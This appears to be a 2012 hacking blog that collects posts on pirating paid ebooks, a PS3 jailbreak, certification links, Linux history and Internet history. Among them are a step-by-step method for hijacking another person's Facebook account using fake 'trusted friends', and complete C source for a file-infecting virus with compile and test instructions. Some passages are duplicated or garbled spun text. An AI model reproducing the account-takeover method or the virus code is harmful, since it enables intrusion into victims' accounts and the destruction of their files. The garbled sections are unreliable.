Saturday, 28 April 2012

How to download clickbank ebooks ethically using google.

Using this simple technique I've hacked many clickbank ebooks but among them the hottest are Blogging to the bank -price $49 -by Rob Benwell and Google Cash -price $67- by Chris Carpenter and 'Tag and Ping' by Sean Wu with a price $147 and the book from the rich jerk and ..OK..now come to the point.


You can hack only ebooks using this technique.The logic is simple -all ebooks are written in PDF format.
So , go to Google at first and search for the name of the ebook appending .pdf in it.For example if you want to read the ebook Bloggingtothebank you have to search for 'bloggingtothebank.pdf'.Thats it!

Try these ways:

* With hyphen between words eg blogging-to-the-bank.pdf


* Without hyphen between words eg bloggingtothebank.pdf


* With the name of the website eg TagandPing.com-remove .com with .pdf -TagandPing.pdf


Sometime Google doesn't work then try Yahoo or MSN search.There are hundreds of ebooks you can read this way.

But this is a very poor technique and often useless for higher product security ; there are more lethal techniques like -

1. First technique: File extension attack.


2. Second technique-Directory index attack.


3. Third technique-Site directory attack.


4. Fourth technique- Thank you page and other extension attack.


5. Fifth technique-Bit torrent attack.


You can learn these technique from the website http://cbindia.googlepages.com

Is It Legal? Blame it on Google ! We have full right to search anyword , anything , anyway on search engines and use the results for our favours.

Itzz Hard BUT i Knoe You Can Do IT HAck Friendz Facebook Account ?


I am going to teach you Hacking Facebook account passwords, i have already explained Hacking Facebook accounts or password using keyloggers and Phishing but this is absolutely manual method to hack Facebook password and its 500% working...Did you got  a shock if not, then you will get after reading this article. Facebook is adding more and more features to attract users but when you develop something that's for sure you will introduce new loopholes. Today i will explain you how to hack a Facebook account password just by utilizing recovery password loophole. These novice coders think that they have made secured features but they really doesn't their daddy is sitting outside. By today's hacking method i can give guarantee to you that you can hack anyone's Facebook account in less than 5 minutes and its 100% working hack and i have used it more than 100 times. I always tell things little bit late as i always love to enjoy the fancy of new loops..:P... This hack method is without using any tools...

Requirement to hack someone's Facebook account:
1. Victim (whose Facebook account password you wanna hack) should be on Facebook.
2. Create four to five fake Facebook accounts(three are sufficient but one more for bonus). I will advice you that create accounts with girl names and put an awesome girls photograph. Fill the basic profile.. Why i am saying create account with Girl names is just because Hungry boys accepts girls friend request without any delay. And if you know the person personally then create account with names of his near ones and say that you have created new profile so add you as a friend. Note all the three to four fake accounts should not be friends or any relationship with each other.
3. Most important requirement you need to add all above three account to the friends list of victim whose Facebook account you want to hack. Above method will be helpful for that :P.
3. At least two web browsers. So that one can be used as recovery purpose and one for viewing codes.

So guys i hope you all are clear with requirements to hack Facebook account password. Now lets hack someone's  Facebook account password practically to show that hacking Facebook account really works.

Steps to hack any Facebook account password in less than 10 minutes 100% working hack with practical example:  
In these steps i am hacking the Facebook account password of user whose email ID is ajay2008singh@gmail.com (its mine own account but fake one that i use for testing hacks).
1. Open the Facebook in your web browser. 
2. Now Click on Forgot your password? Now a new tab will open something like this. In the email box give the email ID 'NAimHAshmiBlog@gmail.com' and press enter or click on search button as shown in below snapshot..
Learn How to hack Facebook account password 

3. Now after Clicking on search you will get an Captcha verification. Type the words displayed and press enter.
4. Now You have reached to the screen Where Facebook gives the search results of the identity of previous step. There you will see button saying "This is my account" just click on that as shown below in snapshot:

Facebook account password hacking 

5. Now you have reached to the below Facebook password recovery screen as show below:
How to hack Facebook account password 
Now Click on "No Longer have access to these?" hyperlink to go to next step.

6. Ahhah... It sounds great everything going smoothly... So friends after following step 5 you will reach below page that ask you Enter your new email ID for contact. Its most important as password reset request after submitting codes will be received on this.. Below is snapshot of screen 4:

Hacking Facebook account password 
7. After submitting you will have either of two situations:
a. First One will be recover your account with friends.
b. Answer the security question if victim has set the security question.

Now what...

Oops.. he has set the security question and i dont know the answer... What should i do??.....Scared ... nopes...worried... nopes... Let's enter wrong answer to his security question three times... Omg... WTF has happened I am redirected to the First option " Recover your account with your friends" .. :P .. I love explain things in dramatic manner so that reader also get interest. :P

8. Now you are at screen saying " Recover your password using your friends" as shown below in snapshot.

Facebook account hacked 
9. Just click on continue and select the three trusted friends :P The three fake accounts that we have created for him to hack his account....:P.. 
You can also perform this hack by making your friends participate to hack someones account...Now select three accounts one by one as one... Below is the screen shot showing that i have selected three friends whom i am sending codes.


Facebook account password hacking

10. Foow....Oops.. I got all the three codes....Below is the screen where you will enter those three codes that you have received...

successfully hacked facebook password


So guys we are done.... Fill the codes into boxes that you have received into you messages in Facebook and on email if feed is subscribed.

Click on submit now it will ask you to validate your email account that you have filled in Step number 6. That email should be genuine as you will receive recovery email on that email account only...

That finishes my Practical example with complete clear snapshots to hack Facebook account password..

I hope you all have enjoyed this hacking guide.... If you have any queries ask me in form of comments... And friends please comment if you like it...

Subscribe US For More FUn....................

Sunday, 22 April 2012

CERTIFICATIONS




The real value of certification isn’t so much the cert you receive it is
 really the steps that a person must goes through in order to pass the required exams.
Security breaches may occur in any part of a system. That includes business 
systems as well as computer systems. For this reason, security is everyone’s job.
 Everyone who has sensitive information or access to sensitive systems poses a
 vulnerability to the organization’s security. Even a company directory may be 
considered sensitive, and every employee has access to that.
Security is not intuitive. Most people do not think in these terms. A help-desk 
analyst, for example, is trained to be helpful, not suspicious. So if everyone is a
 potential vulnerability, and the necessary outlook and knowledge are not commonly 
found in employees, then there is a clear need for education, training, and certification.


Certification Links
 
APPLICATION DEVELOPMENT/PROGRAMMING
 Allaire  GO
 Certified ColdFusion Developer
 Chauncey Group  GO
 Associate Technical Specialist (ATS)
 Cognos  GO
 Business Intelligence Certification Program
 IBM  GO
 Various Certification Programs
 Informix  GO
 Informix Certified Developer
 J.D.Edwards  GO
 J.D.Edwards Certification
 Lotus Corp.  GO
 Certified Lotus Specialist
 Microsoft  GO
 Microsoft Certified Solution Developer (MCSD)
 Oracle  GO
 Certified Application Developer
  Certified Internet Appplication Developer
 SAP  GO
 SAP R/3 System Consultant Certification
 Sun Microsystems  GO
 Various Certification Programs
 Sybase  GO
 Sybase Certified Professional   
 COMPUTER AND NETWORK SECURITY ENGINEERS
 American Society for Industrial Security (ASIS)  GO
 Certified Protection Professional (CPP)
 Checkpoint  GO
 Checkpoint Certified Security Administrator
 Cisco  GO
 Security Specialist 1
 Colorado Computer Training Institute (CCTI)  GO
 Certified Network Security
 Professional Program  (CNSA, CNSE, CSNM, CNSP)
 Hewlett-Packard  GO
 Certified Advanced IT Prefessional
 IBM  GO
 Various Certification Programs
 Info Systems Audit & Control Assn  GO
 Certification Information Systems Auditor (CISA)
 Institute of Internal Auditors

 Certification in Control Self-Assessment (CCSA)  GO
 Certified Internal Auditor (CIA)  GO
 International Information Systems  GO
 Security Certification Consortium

 Certified Information Systems Security
 Professional (CISSP)  Systems Security 
 Certified Practitioner (SSCP)
 SANS  GO
 Global Incident Advisory Center (GIAC)
 TruSecure Corporation  GO
 
 

Some other certifications of interest:

 
DATABASE ADMINISTRATOR
 IBM  GO
 Various Certifictioin Programs
 Informix  GO
 Certified Systems Administrator
 Microsoft  GO
 Microsoft Certified Database Administrator (MCDBA)
 Oracle  GO
 Oracle Database Administrator
 Sybase  GO
 Sybase Certified Professional   
 DATABASE ANALYST/SPECIALIST
 IBM  GO
 IBM Certified Solutions Expert
 Microsoft  GO
 Microsoft Certified Database Administrator (MCDBA)
 Oracle  GO
 Oracle8 Certified Database Operator  Oracle8i 
 Certified Internet Database Operator
 Sybase  GO
  
Sybase Certified Professional
 E-COMMERCE SOLUTION PROVIDER
  
Centura
 GO
 e-WebSolutions Professional
 Chauncey Group  GO
 Associate Technical Specialist (ATS)
 CompTIA  GO
 eminusBizplus, iminusNetplus
 IBM  GO
 Various Certification Programs
 Novell  GO
 Certified Directory Engineer (CDE)
 Openmarket  GO
 e-Business Suite certification
 Sun Microsystems  GO
 Various Certification Programs

Training Links
1. Cyber Security Experts
2. CISSP Exam Cram Training
3. CEH Ethical Hacker Training
4. CISA Certification Training
5. CISM Certification Training
6. Security Assessments

Windows Hacking Links

Microsoft Baseline Security Analyzer (MBSA)
Microsoft Baseline Security Analyzer (MBSA)
Winfingerprint.com
CVE - Common Vulnerabilities and Exposures
NetBIOS protocol, netbeui over TCP, server message blocks
NetBIOS - Wikipedia
NetBios NetBEUI NBF Networking Introduction
How To Configure TCP/IP Networking While NetBIOS Is Disabled in Windows 2000 Server
samba without netbios
The SMB Man-In-the-Middle Attack -- Example hashes here
SmbRelay captures NTLM hashes
L0phtCrack - It's over
ettercap - man in the middle attacks on LAN
Irongeek's Wall of Social Science Majors (inspired by the Wall of Shame/Wall of Sheep)
Ettercap tips and tricks
CIFS: A Common Internet File System
CIFS: Common Insecurities Fail Scrutiny
Winsock - Wikipedia
Microsoft Security: IIS Lockdown Tool
Top 10 Vulnerability Scanners
Wall of Sheep - I see stupid people
Wall of Sheep at DEFCON illustrates what not to do
Tripwire Tutorial -- Signature-based intrusion detection
Null session in Windows XP
Null session attacks: Who's still vulnerable?

Linux Hacking Links

no eth0 in /dev - LinuxQuestions.org
Controlling your Linux system processes
Linux Demo for Lecture
Securing Linux by breaking it with Damn Vulnerable Linux
Damn Vulnerable Linux - The most vulnerable and exploitable operating system ever
Linux.com | CLI Magic: Trojan Scan
Trojan-Spy.Linux.Logftp
Trojan horses plague open source: ZDNet Australia: News: Business
LRK: Linux Rootkit Information and source code
Hiding code -- details about Linux Rootkits
tornkit: a Linux Rootkit for Red Hat 6 & 7
trapkit.de - Rootkit Profiler LX (RKProfiler LX) -- Versions for Ubuntu and Ubuntu on VMware
Rootkit detector app..? - Ubuntu Forums -- chkrootkit and Rootkit Hunter included in Ubuntu archives
Linux Kernel PRCTL Core Dump Handling Privilege Escalation Vulnerability
Easy Rootkit Crontab Exploit Found
Security on Ubuntu
Detecting Rootkits under Linux
debian.org compromise cleanup status -- How the SuckIt Rootkit was used to take over the debian.org main servers in 2003
Suckit Source Code -- a Linux Rootkit
VMware 4.0 and Redhat 9 - How to get ethernet working
Analysis of a Suckit detection and removal
Downloadable Linux Rootkits -- A good list
Tripwire Tutorial
 Linux File Structure
Unix/Linux Command Reference
How to change font colours in Gnome Terminal window
Trojan programs improve attack methods -- the Sheepshank Trojan Explained
The Ultimate Linux Reference Guide for Newbies

System Hacking



The goal of the system hacking is to be able to authenticate to the remote or targeted host with the highest level of access. There are several ways this can be attempted including buffer overflow, exploiting a vulnerability, sniffing a password, guessing a password, social engineering, etc.

Denial of Service
A variation of the SYN attack is a reflective attack. An attacker launches a reflective attack by sending a large number of SYN packets to a web server but alters the source address so it is spoofed to match the address of the victim. The web server responds to the large number of SYN packets by issuing a flood of traffic back to the spoofed victims address. The victim sees the flood of traffic as an attack.

 


Buffer Overflow
Buffer overflows are usually categorized according to the memory region in which the overflow occurs. The stack area of memory serves a variety of purposes, such as passing arguments to functions, storing local variables, and keeping track of where execution should return to when the current function is finished executing.
Example of a Stack Overflow
void func(char *str)
{
        char name[64];
        strcpy(name,str);
        printf("Hello, %s\n",name);
}
 int main(int argc, char **argv)
{
        if(argc < 2)  {
       printf("Usage: %s name\n",argv[0]);
       return –1;
        }
        func(argv[1]);
        return 0;
}
System Hacking

The goal of the system hacking is to be able to authenticate to the remote or 
targeted host with the highest level of access. There are several ways this 
can be attempted including buffer overflow, exploiting a vulnerability, 
sniffing a password, guessing a password, social engineering, etc.

Denial of Service
A variation of the SYN attack is a reflective attack. An attacker launches a 
reflective attack by sending a large number of SYN packets to a web server 
but alters the source address so it is spoofed to match the address of the 
victim. The web server responds to the large number of SYN packets by 
issuing a flood of traffic back to the spoofed victims address. The victim 
sees the flood of traffic as an attack.

 


Buffer Overflow
Buffer overflows are usually categorized according to the memory region
 in which the overflow occurs. The stack area of memory serves a variety 
of purposes, such as passing arguments to functions, storing local variables, 
and keeping track of where execution should return to when the current function is finished executing.
Example of a Stack Overflow
void func(char *str)
{
        char name[64];
        strcpy(name,str);
        printf("Hello, %s\n",name);
}
 int main(int argc, char **argv)
{
        if(argc < 2)  {
       printf("Usage: %s name\n",argv[0]);
       return –1;
        }
        func(argv[1]);
        return 0;
}

Friday, 20 April 2012

Create Your Own PS3 Jailbreak Modchip

Right before you have down talking on creating your PS3 jailbreak modchip, you need to understand what pS3 jailbreak is. Lost are the days, when you wish to pay out money every time you elect to use on Sony’s playstation, you will tend to have a very simpler procedure, where playstation are jailbreak by the hookers.
Much more if you want to insert an internal modchip to operate your PS3 jailbreak in order to transfer games on your own disk drive. It has an part of hazard involved once you attempt and insert an enclosed modchip. Firstly, you might need to incur a loss since your warranty may be stripped-down off your device, if caught hacking a playstation. Secondly, the method involves many hassle, perhaps you might have to open it box, and in addition they solder the inside modchip from the system box. There exists constantly a probability your playstation motherboard might become damaged, you might pile on loses, that is tough to cover, unless you’re an professional who are able to practice it without resulting in a hitch.
There are lots of issues which require for being dealt with. However, when you try and have an exterior modchip to jailbreak PS3, it’s an entirely different story. The maximum benefit of external modchips is that you don’t have a chance to harm your Playstation apparatus.
If you posses some know-how with the Xbox hacking system, you will acknowledge how easy it is. The hacking system will come in the sort of PS3 jailbreak software, which allows you to definitely duplicate games from the playstation to your hard disk drive. Though, it isn’t difficult, you will want some degree of perception of the machine so it will be work.
There are plenty sites that permit you to definitely get software basically needed for PS3 jailbreak and duplicate playstation games on your system. Many of these websites also educate you regarding how to undertake it. Still, many turn into false site, which is why this PS3 jailbreak sites undependable. You can also do-it-yourself.
Here’s tips on how to take action.
Firstly the procedure of PS3 jailbreak, the 1st move in your case is usually to acquire PS3 homebrew installer to your playstation. The software program PS3 homebrew installer then unlocks your playstation code and climbs into the unit, copies the action, and starts playing in the interior hard drive. The maximum reward with possessing software program is it works for you without causing injury to your body, and also doesn’t impact your warranty. The chances of you getting caught red handed may also be even less.
You don’t to set up a modchip, though the software hacks the firmware of the playstation, and you’re capable of play games. It’s that easy. Selecting surprised about the effectiveness of the application PS3 homebrew installer. Besides hacking the playstation for copying games, it’s simple to also observe Blu ray movies and particular PS3 games exclusively coded for just a specific location.

To get more the latest about PS3 jailbreak just click jailbreak PS3.

Create Virus in C

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here?s the source code of the virus program.
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(?*.*?,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],?rb?);
host=fopen(ffblk.ff_name,?rb+?);
if(host==NULL) goto next;
x=89088;
printf(?Infecting %sn?,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(?DONE! (Total Files Infected= %d)?,a);
end=clock();
printf(?TIME TAKEN=%f SECn?,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT?S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT):
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
HOW TO TEST:
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That?s it.
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS COD

How To Create Your Own iPhone Apps With IPhone Dev Secrets

How To Create Your Own iPhone Apps With IPhone Dev Secrets
Article by Naim Abouhafs
Hi, my name is A. Naim and you are currently reading an honest review iPhone & iPad App Dev Secrets.
Probably you have heard the story of Robert Ney; 15 years old boy, who has become a millionaire just by designed an iPhone app video game that has been downloaded 9.1 MILLIONS times. The name of the game he developed is Bubble Ball.
I’m telling you this story just to show you that you can do the same thing as he did by following the instructions of iPhone Dev Secrets, even if you know absolutely nothing about programming.
Before I get started, I want you to know that I’ll be going into the good and the bed points of this product, so if that’s something you don’t want to hear it, you may skip this article now.
IPhone Dev Secrets is a really simple training program that takes you through all you need to know to create and market your own successful iPad or iPhone apps and games in just 4 weeks. It’s designed for everyone. You don’t need to have a knowledge of C++, Java, Python or any other programming language.
In the next lines, you will read a brief summary of each week of this course.
In the first week, you will learn how to create your own app or game using several programs such as: Cocos2d toolkit, Adobe Flash CS5, iWebkit and so on. Also, in this week you will learn some new terms about app & game development and you will be able to debug your first application with easy steps.
In the second week, you will learn more advanced tools and tricks of Cocos2d and iWebkit.
In the third week, you will learn how to build 3D apps and games. The training will focus in this week on steps that you need to know, to help you to create your application. Also, you will learn some cheat tools and programs that will help you to save time while creating your apps or games. At the end of this week, you should have created your first app or game.
In the last week, you will learn some useful and successful methods to market your applications and games on Apple Store. This section was created by Mike and some other successful apps marketers.
To be able to use this course, you must have an iPad or iPhone, because you will need to test you apps and games in it. Moreover, to get best result, you will need to be focused in every word you will hear it in this course, and I recommend you to repeat the videos several times till you get all of it.
In conclusion, if you still confused, let me tell you something that I’m sure will make you happy. If you buy this course, you will get 60-Day Satisfaction Guaranty; which means if at any time in the first two months for any reason (or no reason at all), you’re not absolutely thrilled with what you’ve learned in this course, all you have to do is send a quick email to Mike at the address that you will find here, and he’ll refund every penny you paid on this course. Moreover, this course comes with an impressive bonus. (The bonus is the notes and interviews that Mike had with top developers and successful marketers.)
Don’t waste time, and get you version now by visiting http://bit.ly/yrpPIy.

Wednesday, 18 April 2012

Top ten reasons to install Linux on your PC:


1.When Linux is outlawed, only outlaws will own Linux.
2. When installing Linux, it is so much fun to run fdisk without backing up first.
3.The flames you get from asking questions on Linux newsgroups are of a higher quality than the flames
you get for posting to alt.sex.bestiality.
4.No matter what flavor of Linux you install, you'll find out tomorrow there was a far more 3l1te ersion you
should have gotten instead.
5.People who use Free BSD or Solaris will not make fun of you. They will offer their sympathy instead.
6.At the next Def Con you'll be able to say stuph like "so then I su-ed to his account and grepped all his files
for 'kissyface'." Oops, grepping other people's files is a no-no, forget I ever suggested it.
7.Port surf in privacy.
8.One word: exploits.
9.Installing Linux on your office PC is like being a postal worker and bringing an Uzi to work.
10.But - - if you install Linux on your office computer, you boss won't have a clue what that means.

Linux!


Unix has become the primo operating system of the Internet. In fact, Unix is the most widely used operating
system in the world among computers with more power than PCs.
True, Windows NT is coming up fast as a common Internet operating system, and is sooo wonderfully
buggy that it looks like it could become the number one favorite to crack into. But today Unix in all its
wonderful flavors still is the operating system to know in order to be a truly elite hacker.
So far we have assumed that you have been hacking using a shell account that you get through your
Internet Service Provider (ISP). A shell account allows you to give Unix commands on one of your ISP's
computers. But you don't need to depend on your ISP for a machine that lets you play with Unix. You can
run Unix on your own computer and with a SLIP or PPP connection be directly connected to the Internet.
***********************
Newbie note: Serial Line Internet Protocol (SLIP) and Point-to-Point Protocol (PPP) connections give you a
temporary Internet Protocol (IP) address that allows you to be hooked directly to the Internet. You have to
use either SLIP or PPP connections to get to use a Web browser that gives you pictures instead on text
only. So if you can see pictures on the Web, you already have one of these available to you.
The advantage of using one of these direct connections for your hacking activities is that you will not leave
behind a shell log file for your ISP's sysadmin to pore over. Even if you are not breaking the law, a shell log
file that shows you doing lots of hacker stuph can be enough for some sysadmins to summarily close your
account.
********************
What is the best kind of computer to run Unix on? Unless you are a wealthy hacker who thinks nothing of
buying a Sun SPARC workstation, you'll probably do best with some sort of PC. There are almost countless
variants of Unix that run on PCs, and a few for Macs. Most of them are free for download, or inexpensively
available on CD-ROMs.
The three most common variations of Unix that run on PCs are Sun's Solaris, FreeBSD and Linux. Solaris
costs around $700. Enough said. FreeBSD is really, really good. But you con't find many manuals or
newsgroups that cover FreeBSD.
Linux, however, has the advantage of being available in many variants (so you can have fun mixing and
matching programs from different Linux offerings). Most importantly, Linux is supported by many manuals,
news groups, mail lists and Web sites. If you have hacker friends in your area, most of them probably use
Linux and can help you out.
*********************
Historical note: Linux was created in 1991 by a group led by Linus Torvalds of the University of Helsinki.
Linux is copyrighted under the GNU General Public License. Under this agreement, Linux may be
redistributed to anyone along with the source code. Anyone can sell any variant of Linux and modify it and
repackage it. But even if someone modifies the source code he or she may not claim copyright for anything
created from Linux. Anyone who sells a modified version of Linux must provide source code to the buyers
and allow them to reuse it in their commercial products without charging licensing fees. This arrangement is
known as a "copyleft."
Under this arrangement the original creators of Linux receive no licensing or shareware fees. Linus Torvalds
and the many others who have contributed to Linux have done so from the joy of programming and a sense
of community with all of us who will hopefully use Linux in the spirit of good guy hacking. Viva Linux! Viva
Torvalds!
**********************
Linux consists of the operating system itself (called the "kernel") plus a set of associated programs.
The kernel, like all types of Unix, is a multitasking, multi-user operating system. Although it uses a different
file structure, and hence is not directly compatible with DOS and Windows, it is so flexible that many DOS
and Windows programs can be run while in Linux. So a power user will probably want to boot up in Linux
and then be able to run DOS and Windows programs from Linux.
Associated programs that come with most Linux distributions may include:
* a shell program (Bourne Again Shell -- BASH -- is most common);
* compilers for programming languages such as Fortran-77 (my favorite!), C, C++, Pascal, LISP, Modula-2,
Ada, Basic (the best language for a beginner), and Smalltalk.;
* X (sometimes called X-windows), a graphical user interface
* utility programs such as the email reader Pine (my favorite) and Elm

What types of Linux work best? It depends on what you really want. Redhat Linux is famed for being the
easiest to install. The Walnut Creek Linux 3.0 CD-ROM set is also really easy to install -- for Linux, that is!
My approach has been to get lots of Linux versions and mix and match the best from each distribution.
I like the Walnut Creek version best because with my brand X hardware, its autodetection feature was a lifesaver.
INSTALLING LINUX is not for the faint of heart! Several tips for surviving installation are:
1) Although you in theory can run Linux on a 286 with 4 MB RAM and two floppy drives, it is *much*
easier with a 486 or above with 8 MB RAM, a CD-ROM, and at least 200 MB free hard disk space.
2) Know as much as possible about what type of mother board, modem, hard disk, CD-ROM, and video card
you have. If you have any documentation for these, have them on hand to reference during installation.
3) It works better to use hardware that is name-brand and somewhat out-of-date on your computer. Because
Linux is freeware, it doesn't offer device drivers for all the latest hardware. And if your hardware is like mine -
- lots of Brand X and El Cheapo stuph, you can take a long time experimenting with what drivers will work.
4) Before beginning installation, back up your hard disk(s)! In theory you can install Linux without harming
your DOS/Windows files. But we are all human, especially if following the advice of point 7).
5) Get more than one Linux distribution. The first time I successfully installed Linux, I finally hit on
something that worked by using the boot disk from one distribution with the CD-ROM for another. In any
case, each Linux distribution had different utility programs, operating system emulators, compilers and more.
Add them all to your system and you will be set up to become beyond elite.
6) Buy a book or two or three on Linux. I didn't like any of them! But they are better than nothing. Most
books on Linux come with one or two CD-ROMs that can be used to install Linux. But I found that what was
in the books did not exactly coincide with what was on the CD-ROMs.
7) I recommend drinking while installing. It may not make debugging go any faster, but at least you won't
care how hard it is.
Now I can almost guarantee that even following all these 6 pieces of advice, you will still have problems
installing Linux. Oh, do I have 7 advisories up there? Forget number 7. But be of good cheer. Since everyone
else also suffers mightily when installing and using Linux, the Internet has an incredible wealth of resources
for the Linux -challenged.
If you are allergic to getting flamed, you can start out with Linux support Web sites.
The best I have found is http://sunsite.unc.edu:/pub/Linux/. It includes the Linux Frequently Asked
Questions list (FAQ), available from
sunsite.unc.edu:/pub/Linux/docs/FAQ.
In the directory /pub/Linux/docs on sunsite.unc.edu you'll find a number of other documents about Linux,
including the Linux INFO-SHEET and META-FAQ,
The Linux HOWTO archive is on the sunsite.unc.edu Web site at: /pub/Linux/docs/HOWTO. The directory
/pub/Linux/docs/LDP contains the current set of LDP manuals.
You can get ``Linux Installation and Getting Started'' from sunsite.unc.edu in /pub/Linux/docs/LDP/installguide.
The README file there describes how you can order a printed copy of the book of the same name
(about 180 pages).
Now if you don't mind getting flamed, you may want to post questions to the amazing number of Usenet
news groups that cover Linux. These include:
comp.os.linux.advocacy Benefits of Linux compared
comp.os.linux.development.system Linux kernels, device drivers
comp.os.linux.x Linux X Window System servers
comp.os.linux.development.apps Writing Linux applications
comp.os.linux.hardware Hardware compatibility
comp.os.linux.setup Linux installation
comp.os.linux.networking Networking and communications
comp.os.linux.answers FAQs, How-To's, READMEs, etc.
linux.redhat.misc
alt.os.linux Use comp.os.linux.* instead
alt.uu.comp.os.linux.questions Usenet University helps you
comp.os.linux.announce Announcements important to Linux
comp.os.linux.misc Linux-specific topics
Want your Linux free? Tobin Fricke has pointed out that "free copies of Linux CD-ROMs are available the
Linux Support & CD Givaway web site at http://emile.math.ucsb.edu:8000/giveaway.html. This is a project
where people donate Linux CD's that they don't need any more. The project was seeded by Linux Systems
Labs, who donated 800 Linux CDs initially! Please remember to donate your Linux CD's when you are done
with them. If you live near a computer swap meet, Fry's, Microcenter, or other such place, look for Linux
CD's there. They are usually under $20, which is an excellent investment. I personally like the Linux
Developer's Resource by Infomagic, which is now up to a seven CD set, I believe, which includes all major
Linux distributions (Slackware, Redhat, Debian, Linux for DEC Alpha to name a few)plus mirrors of
tsx11.mit.edu and sunsite.unc.edu/pub/linux plus much more. You should also visit the WONDERFUL linux
page at
http://sunsite.unc.edu/linux, which has tons of information, as well as the
http://www.linux.org/. You might also want to check out
http://www.redhat.com/ and http://www.caldera.com/ for more
information on commercial versions of linux (which are still freely available under GNU)."
How about Linux security? Yes, Linux, like every operating system, is imperfect. Eminently hackable, if you
really want to know. So if you want to find out how to secure your Linux system, or if you should come
across one of the many ISPs that use Linux and want to go exploring (oops, forget I
wrote that), here's where you can go for info:
ftp://info.cert.org/pub/cert_advisories/CA -94:01.network.monitoring.attacks
ftp://info.cert.org/pub/tech_tips/root_compromise
http://bach.cis.temple.edu/linux/linux-security/
http://www.geek-girl.com/bugtraq/
There is also help for Linux users on Internet Relay Chat (IRC). Ben (cyberkid@usa.net)
hosts a channel called #LinuxHelp on the Undernet IRC server.
Last but not least, if you want to ask Linux questions on the Happy Hacker list, you're welcome. We may be
the blind leading the blind, but what
the heck!

History of Internet Not The Computer


As mentioned above, the Internet was born as a US Advanced Research Projects Agency (ARPA) effort in
1969. Its inventors called it ARPANET. But because of its value in scientific research, the US National
Science Foundation (NSF) took it over in 1983. But over the years since then it gradually evolved away from
any single source of control. In April 1995 NSF cut the last apron strings. Now the Internet is run by no one.
It just happens and grows out of the efforts of those who play with it and struggle with the software and
hardware.
Nothing at all like this has ever happened before. We now have a computer system with a life of its own.
We, as hackers, form a big part of the mutation engine that keeps the Internet evolving and growing
stronger. We also form a big part of the immune system of this exotic creature.
The original idea of ARPANET was to design a computer and communications network that would
eventually become so redundant, so robust, and so able to operate without centralized control, that it could
even survive nuclear war. What also happened was that ARPANET evolved into a being that has survived
the end of government funding without even a blip in its growth. Thus its anarchic offspring, the Internet,
has succeeded beyond the wildest dreams of its original architects.
The Internet has grown explosively, with no end in sight. At its inception as ARPANET it held only 4 hosts.
A quarter of a century later, in 1984, it contained only 1000 hosts. But over the next 5 years this number grew
tenfold to 10,000 (1989). Over the following 4 years it grew another tenfold to 1 million (1993). Two years
later, at the end of 1995, the Internet was estimated to have at least 6 million host computers. There are
probably over 10 million now. There appears to be no end in sight yet to the incredible growth of this mutant
child of ARPANET.
In fact, one concern raised by the exponential growth in the Internet is that demand may eventually far
outrace capacity. Because now no entity owns or controls the Internet, if the capacity of the
communications links among nodes is too small, and it were to become seriously bogged down, it might be
difficult to fix the problem.
For example, in 1988, Robert Morris, Jr. unleashed a "virus"-type program on the Internet commonly known
as the “Morris Worm.” This virus would make copies of itself on whatever computer it was on and then
send copies over communications links to other Internet hosts. (It used a bug in sendmail that allowed
access to root, allowing the virus to act as the superuser).
Quickly the exponential spread of this virus made the Internet collapse from the communications traffic and
disk space it tied up.
At the time the Internet was still under some semblance of control by the National Science Foundation and
was connected to only a few thousand computers. The Net was shut down and all viruses purged from its
host computers, and then the Net was put back into operation. Morris, meanwhile, was put in jail.
There is some concern that, despite improved security measures (for example, "firewalls"), someone may
find a new way to launch a virus that could again shut down the Internet. Given the loss of centralized
control, restarting it could be much more time-consuming if this were to happen again.
But reestablishing a centralized control today like what existed at the time of the “Morris Worm” is likely to
be impossible. Even if it were possible, the original ARPANET architects were probably correct in their
assessment that the Net would become more susceptible for massive failure rather than less if some
centralized control were in place.
Perhaps the single most significant feature of today's Internet is this lack of centralized control. No person
or organization is now able to control the Internet. In fact, the difficulty of control became an issue as early
as its first year of operation as ARPANET. In that year email was spontaneously invented by its users. To
the surprise of ARPANET's managers, by the second year email accounted for the bulk of the
communication over the system.
Because the Internet had grown to have a fully autonomous, decentralized life of its own, in April 1995, the
NSF quit funding NSFNET, the fiber optics communications backbone which at one time had given NSF the
technology to control the system. The proliferation of parallel communications links and hosts had by then
completely bypassed any possibility of centralized control.
There are several major features of the Internet:
* World Wide Web -- a hypertext publishing network and now the fastest growing part of the Internet.
* email -- a way to send electronic messages
* Usenet -- forums in which people can post and view public messages
* telnet -- a way to login to remote Internet computers
* file transfer protocol -- a way to download files from remote Internet computers
* Internet relay chat -- real-time text conversations -- used primarily by hackers and other Internet old-timers
* gopher -- a way of cataloging and searching for information. This is rapidly growing obsolete.
As you port surfers know, there are dozens of other interesting but less well known services such as whois,
finger, ping etc.
The World Wide Web
The World Wide Web is the newest major feature of the Internet, dating from the spring of 1992. It consists
of "Web pages," which are like pages in a book, and links from specially marked words, phrases or symbols
on each page to other Web pages. These pages and links together create what is known as "hypertext."
